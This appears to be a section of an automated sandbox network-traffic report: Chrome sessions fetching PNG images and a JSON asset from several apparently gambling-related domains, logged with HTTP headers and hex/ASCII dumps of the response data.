                                                                                                                                                          2024-06-09 22:41:19 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:19 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 35 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          2024-06-09 22:41:19 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          533192.168.2.55031723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC649OUTGET /pc/image-pc/index/382/news/icon_news.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC613INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 426
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:14 GMT
                                                                                                                                                          ETag: "64c0a20a-1aa"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[3],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE27[3],EU-FRA-paris-GLOBAL1-CACHE9[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473790
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 4262c8d6c858f774379b07e995832bde
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118210
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC426INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 15 00 00 00 13 08 06 00 00 00 7f 4e 46 8b 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 01 5c 49 44 41 54 38 8d a5 d4 3b 4b 9c 41 14 c6 f1 df 6e 96 45 21 28 1a 6c 44 8c 60 f0 52 24 a9 0c 28 8a 82 b1 b2 8e 90 46 10 09 a2 46 62 97 3a 1f 22 82 58 a4 48 2a 6f 85 85 17 b4 14 bf 80 8d 82 24 45 40 42 e2 16 41 51 88 2b 58 bc 63 58 12 76 df 91 7d 60 e0 cc e1 cc 7f ce 9c 39 33 99 e2 41 9b 08 65 f0 01 b3 e8 c1 d7 4a c1 b9 08 e0 03 7c c4 54 98 37 57 0b cd e3 0b 5e 45 6c 1e 05 7d 88 75 8c dc 07 08 d9 32 fe 46 ec 45 02 f3 d8 92 9c 28 4f 92 69 17 a6 51 53 12 38 88 ce c8 c4 6a d1 8b 7a 5c e1 4d a6 78 d0 76 82 f6 48 00 0c 60 1f ad 98 c1 12 ba b1 21 e9 92 be ec 3d 81 a5 9a c0 7b 6c 4b 4a b5 12
                                                                                                                                                          Data Ascii: PNGIHDRNFpHYs\IDAT8;KAnE!(lD`R$(FFb:"XH*o$E@BAQ+XcXv}`93AeJ|T7W^El}u2FE(OiQS8jz\MxvH`!={lKJ


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          534192.168.2.55031890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC611OUTGET /pc/image-pc/index/312/nav/liveCasino/02.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 44229
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:48 GMT
                                                                                                                                                          ETag: "5d71fe80-acc5"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[3],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE8[3],EU-FRA-paris-GLOBAL1-CACHE7[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465103
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: b98642f3405f16707e0772fb77db42ab
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126897
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC15769INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9b 00 00 00 9b 08 06 00 00 00 75 61 e9 8c 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 80 00 49 44 41 54 78 da ec fd 75 98 6c c7 75 2e 0e bf ab 60 53 e3 f0 cc 41 e9 48 3a 92 c5 cc 2c 0b 2c 99 65 8c 1d 5b 26 81 f1 da b9 31 e5 c6 49 ec 24 be 71 92 9b 98 65 81 2d cb b6 cc 10 a3 98 99 c9 62 9d a3 c3 67 78 a6 71 43 55 ad df 1f 7b f7 9c 11 1b 24 fb de ef 4b 3d 4f 3f 3d dd d3 bd 7b ef da ab 56 2d 78 d7 bb 08 ff ff 3e e8 77 f8 4c b4 3d f6 7a df f7 5e 35 25 b6 ff 99 65 02 49 01 e3 80 01 bb f6 b8 87 fe e3 0d 57 c2 ac
                                                                                                                                                          Data Ascii: PNGIHDRuagAMAa cHRMz&u0`:pQ<bKGDCIDATxulu.`SAH:,,e[&1I$qe-bgxqCU{$K=O?={V-x>wL=z^5%eIW
                                                                                                                                                          2024-06-09 22:41:19 UTC16384INData Raw: e9 04 40 31 4e 39 f3 ac fe 26 f5 ed e4 64 b4 42 c0 90 23 dc 0f 63 0b ba b2 45 19 85 85 63 3a 40 58 dc f3 ad 2f cf 1d f9 ee f7 89 13 de 7e 7a f9 d2 6f 7c ae 05 28 28 41 0a 4e 05 80 89 20 55 65 a7 2c 6d 3d 0e 34 01 97 42 91 c2 b6 52 4a 03 88 18 70 53 b8 f2 bc cf de 07 c7 f7 9d 72 fa 07 fa 9c d2 3b eb 5a b8 ff 91 a7 9c 7c d5 b5 ff f5 2d db 2b 5a 75 45 e0 d7 38 7b b0 d6 0a 49 92 e4 5e a2 b1 cf 3b 01 8b 51 0b a5 72 39 d5 5a 39 00 a2 97 6a ca 43 0b 60 66 01 b6 8e 14 49 16 52 90 73 96 a5 54 a4 94 ea 05 77 f3 9c 87 b5 e4 4c c6 b0 a0 24 51 68 36 9b 1c f8 9a 9c 31 0c c7 14 05 1e 1f 7b f4 91 d4 d7 37 00 cf f3 58 11 c8 d3 92 83 c0 cf c3 28 f9 fd 80 54 82 01 41 ce 58 f6 b4 26 4d 92 4b a4 d0 a7 43 dc 73 ff 6f 31 39 39 49 87 1f 79 24 f7 0d 0d 10 04 b1 33 86 42 e1 a1 3b
                                                                                                                                                          Data Ascii: @1N9&dB#cEc:@X/~zo|((AN Ue,m=4BRJpSr;Z|-+ZuE8{I^;Qr9Z9jC`fIRsTwL$Qh61{7X(TAX&MKCso199Iy$3B;
                                                                                                                                                          2024-06-09 22:41:19 UTC12076INData Raw: 35 de 7a e5 27 9b 0b b6 71 98 ca 34 0e 0f 75 34 46 20 1c 9b e0 5c 63 c2 f6 fd c7 af ef b9 e9 f0 af 1e b8 b5 1d b6 df 69 af 59 09 b0 8f 42 31 6b 13 36 7c 61 fd 3d 77 b7 03 05 c0 16 f0 f6 ab 3e 38 1a 24 a7 76 77 1e 7c ea f9 5f 3d 10 b9 94 48 08 22 e0 7d 97 7f c0 ac 5a b6 fa 1e 5d 2a 7d 01 ee a8 5f 39 58 80 d9 95 60 3c 21 b4 85 08 1b 47 8e 32 1f fc d0 e2 a7 1e ff ed 23 d3 d7 ad 5d 3d d9 13 e4 15 8d a5 94 ef 21 c1 19 4a 65 32 d0 46 93 97 08 90 4e 27 8b 8b 16 2d da 6c 8b e1 b8 52 36 db e8 78 43 2c 54 8c be 30 28 7b b8 d8 7b 31 c3 da 88 60 5c 07 3d 1b 0b 18 13 77 7d 3b af 67 a2 12 04 11 79 52 40 0a 45 b3 67 9d 88 65 ab d7 22 91 ae 43 ae bf 84 7c be 44 dd d6 e2 57 bf 7e 94 66 4f 9f 8e c9 c7 4d 84 31 51 ec b2 8e c6 48 0c 0d 0c 8e fe dd ab 79 44 21 08 d5 55 49 8c
                                                                                                                                                          Data Ascii: 5z'q4u4F \ciYB1k6|a=w>8$vw|_=H"}Z]*}_9X`<!G2#]=!Je2FN'-lR6xC,T0({{1`\=w};gyR@Ege"C|DW~fOM1QHyD!UI


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          535192.168.2.55032023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC404OUTGET /fiximg/ac-20200404/fileupload/uy09/202308/202308230603087.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC554INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: application/json
                                                                                                                                                          Content-Length: 26796
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[4],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,4],EU-FRA-paris-GLOBAL1-CACHE25[3],EU-FRA-paris-GLOBAL1-CACHE5[0,TCP_HIT,0],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2464731
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 718f9b787d4de550b1153cb10177cc19
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 127269
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC15830INData Raw: 75 39 6d 45 50 55 47 69 48 6c 45 6d 54 43 67 74 46 76 45 6e 33 75 59 41 76 4d 4b 45 61 6f 73 48 59 72 4d 75 46 69 56 6c 74 30 4b 44 4c 76 68 6c 73 78 48 6d 44 69 76 31 6d 4c 79 32 63 38 6f 53 2b 65 4d 36 73 79 71 35 6b 39 41 4f 32 39 4c 51 63 31 53 32 42 4c 59 77 47 49 75 35 58 51 32 77 34 34 30 4b 47 4a 7a 46 4a 39 43 39 55 54 45 49 35 38 76 46 35 6d 52 54 79 63 61 4a 57 4c 6b 62 63 62 30 48 56 4f 74 4b 7a 61 39 6e 45 34 6e 72 4c 46 6e 6d 6f 34 47 75 71 61 7a 78 6f 47 73 64 67 46 65 6a 6d 2b 6a 4b 6e 2f 74 4f 77 6a 6f 64 6d 6d 31 6f 50 32 78 6c 37 36 46 59 7a 44 72 45 2f 33 78 76 73 62 51 34 78 45 41 37 73 6c 41 61 4e 48 72 67 41 79 43 38 42 4a 6f 47 34 71 70 52 6c 49 4b 42 4b 34 57 39 36 31 41 66 51 67 41 36 75 41 74 50 4c 30 59 2b 4f 36 30 34 35 4b 50
                                                                                                                                                          Data Ascii: u9mEPUGiHlEmTCgtFvEn3uYAvMKEaosHYrMuFiVlt0KDLvhlsxHmDiv1mLy2c8oS+eM6syq5k9AO29LQc1S2BLYwGIu5XQ2w440KGJzFJ9C9UTEI58vF5mRTycaJWLkbcb0HVOtKza9nE4nrLFnmo4GuqazxoGsdgFejm+jKn/tOwjodmm1oP2xl76FYzDrE/3xvsbQ4xEA7slAaNHrgAyC8BJoG4qpRlIKBK4W961AfQgA6uAtPL0Y+O6045KP
                                                                                                                                                          2024-06-09 22:41:19 UTC10966INData Raw: 38 50 4b 75 47 4f 65 61 4f 31 39 54 43 65 4c 36 4a 76 53 2f 6b 44 59 65 49 2f 4c 61 6b 46 69 64 50 5a 43 6e 4c 52 69 62 44 57 58 59 4f 35 43 47 7a 36 36 4e 76 75 42 6a 43 74 33 68 59 46 39 6d 56 67 43 6a 6d 32 58 4c 31 4f 65 37 6f 38 53 47 57 39 76 75 70 51 2f 30 46 58 76 71 31 49 70 2f 55 6a 61 37 35 37 6e 4b 6d 37 7a 44 5a 4e 66 49 72 6b 58 4b 51 38 64 36 38 6c 30 36 62 67 5a 78 77 51 43 68 41 42 53 41 41 6a 39 70 74 55 42 6c 30 51 51 6e 41 55 79 46 63 72 45 61 65 31 4f 33 6e 61 55 5a 66 35 36 64 37 38 4c 59 54 70 6a 6d 51 55 69 49 66 43 58 48 4e 73 76 4a 76 33 48 2f 64 30 4a 6a 76 4a 2f 49 4a 37 37 2b 7a 75 76 76 56 38 55 32 6b 71 77 72 51 42 76 69 6a 32 51 2b 61 58 6f 35 72 72 62 6a 66 71 67 6d 48 49 50 71 32 7a 36 47 58 34 52 55 5a 4b 57 72 35 6f 56
                                                                                                                                                          Data Ascii: 8PKuGOeaO19TCeL6JvS/kDYeI/LakFidPZCnLRibDWXYO5CGz66NvuBjCt3hYF9mVgCjm2XL1Oe7o8SGW9vupQ/0FXvq1Ip/Uja757nKm7zDZNfIrkXKQ8d68l06bgZxwQChABSAAj9ptUBl0QQnAUyFcrEae1O3naUZf56d78LYTpjmQUiIfCXHNsvJv3H/d0JjvJ/IJ77+zuvvV8U2kqwrQBvij2Q+aXo5rrbjfqgmHIPq2z6GX4RUZKWr5oV


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          536192.168.2.550302103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC385OUTGET /zb-cloud/pwv/sn.website.logo.image.url HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:19 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:19 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 39 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          2024-06-09 22:41:19 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 30 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 0
                                                                                                                                                          2024-06-09 22:41:19 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 35 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          2024-06-09 22:41:19 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC82INData Raw: 58 2d 56 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:19 UTC36INData Raw: 58 2d 43 61 63 68 65 3a 20 4d 49 53 53 20 66 72 6f 6d 20 73 67 31 2d 63 64 6e 62 31 33 34 2d 30 32 31 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: MISS from sg1-cdnb134-021
                                                                                                                                                          2024-06-09 22:41:19 UTC20INData Raw: 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 34 0d 0a
                                                                                                                                                          Data Ascii: Content-Length: 24
                                                                                                                                                          2024-06-09 22:41:19 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                          Data Ascii: Connection: close
                                                                                                                                                          2024-06-09 22:41:19 UTC2INData Raw: 0d 0a
                                                                                                                                                          Data Ascii:


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          537192.168.2.55031454.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC650OUTGET /pc/image-pc/index/121/homePage-bg.png HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-qq.gzjqwlkj.com/pc/240516-03/static/css/t3685.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC350INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          ETag: "61260a0d-16e350"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Wed, 25 Aug 2021 09:14:53 GMT
                                                                                                                                                          Content-Length: 1499984
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 13051133846112469743
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC1116INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 07 80 00 00 0b d0 08 06 00 00 00 e4 8c 28 45 00 00 20 00 49 44 41 54 78 5e ec d9 51 0d 00 20 0c 43 41 50 31 ff 4a 21 c1 05 2f 37 07 bd ee af 7b 66 ce 72 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 f0 bd c0 36 00 7f df a1 00 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 78 02 06 60 8f 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 81 88 80 01 38 52 a4 18 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 30 00 fb 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 44 04 0c c0 91 22 c5 20 40
                                                                                                                                                          Data Ascii: PNGIHDR(E IDATx^Q CAP1J!/7{fr @ @ @ 6 @ @ @x`@ @ @ @8R @ @ @0 @ @ @D" @
                                                                                                                                                          2024-06-09 22:41:19 UTC4096INData Raw: 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 18 80 fd 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 22 02 06 e0 48 91 62 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 c0 00 ec 07 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 10 11 30 00 47 8a 14 83 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 06 60 3f 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 81 88 80 01 38 52 a4 18 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 30 00 fb 01 02 04 08 10 20 40 80 00 01 02 04 08 10
                                                                                                                                                          Data Ascii: @ @ @ @ @"Hb @ @ @ @ @ @ @ 0G @ @ @`?@ @ @ @8R @ @ @0 @
                                                                                                                                                          2024-06-09 22:41:19 UTC4096INData Raw: 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 10 11 30 00 47 8a 14 83 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 06 60 3f 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 81 88 80 01 38 52 a4 18 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 30 00 fb 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 44 04 0c c0 91 22 c5 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 80 01 d8 0f 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 20 22 60 00 8e 14 29 06 01 02 04
                                                                                                                                                          Data Ascii: @ @ @ 0G @ @ @`?@ @ @ @8R @ @ @0 @ @ @D" @ @ @ @ @ @ @ @ "`)
                                                                                                                                                          2024-06-09 22:41:19 UTC2800INData Raw: 10 20 40 80 00 01 02 04 08 10 20 40 80 00 81 88 80 01 38 52 a4 18 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 30 00 fb 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 44 04 0c c0 91 22 c5 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 80 01 d8 0f 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 20 22 60 00 8e 14 29 06 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 0c c0 7e 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 11 01 03 70 a4 48 31 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08
                                                                                                                                                          Data Ascii: @ @8R @ @ @0 @ @ @D" @ @ @ @ @ @ @ @ "`) @ @ @~ @ @ @pH1 @ @
                                                                                                                                                          2024-06-09 22:41:19 UTC2888INData Raw: 30 00 47 8a 14 83 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 06 60 3f 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 81 88 80 01 38 52 a4 18 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 30 00 fb 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 44 04 0c c0 91 22 c5 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 80 01 d8 0f 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 20 22 60 00 8e 14 29 06 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 0c c0 7e 80 00
                                                                                                                                                          Data Ascii: 0G @ @ @`?@ @ @ @8R @ @ @0 @ @ @D" @ @ @ @ @ @ @ @ "`) @ @ @~
